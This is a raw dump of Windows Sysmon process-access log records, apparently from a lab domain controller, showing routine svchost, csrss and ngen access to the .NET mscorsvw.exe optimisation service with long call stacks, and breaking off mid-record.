13:46:20.812{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912C-6005-D301-00000000A301}804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:20.812{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912C-6005-D301-00000000A301}804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:20.812{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912C-6005-D301-00000000A301}804C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:20.765{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912C-6005-D201-00000000A301}1200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:20.765{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-912C-6005-D201-00000000A301}1200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006032Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:20.765{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912C-6005-D201-00000000A301}1200C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006031Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:20.703{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912C-6005-D101-00000000A301}2512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006030Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:20.687{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-912C-6005-D101-00000000A301}2512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:20.687{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912C-6005-D101-00000000A301}2512C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:20.359{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912C-6005-D001-00000000A301}3924C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:20.343{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-912C-6005-D001-00000000A301}3924C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:20.343{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912C-6005-D001-00000000A301}3924C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:21.984{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912D-6005-E301-00000000A301}4888C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.968{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912D-6005-E301-00000000A301}4888C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:21.968{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912D-6005-E301-00000000A301}4888C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006082Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:21.906{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912D-6005-E201-00000000A301}4644C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006081Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.890{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912D-6005-E201-00000000A301}4644C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006080Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:21.890{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912D-6005-E201-00000000A301}4644C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006079Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:21.859{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912D-6005-E101-00000000A301}4252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006078Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.843{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912D-6005-E101-00000000A301}4252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006077Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:21.843{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912D-6005-E101-00000000A301}4252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006076Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:21.812{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-912D-6005-E001-00000000A301}5016C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006075Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:21.796{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-912D-6005-E001-00000000A301}5016C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006074Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:46:21.796{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-912D-6005-E001-00000000A301}5016C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.N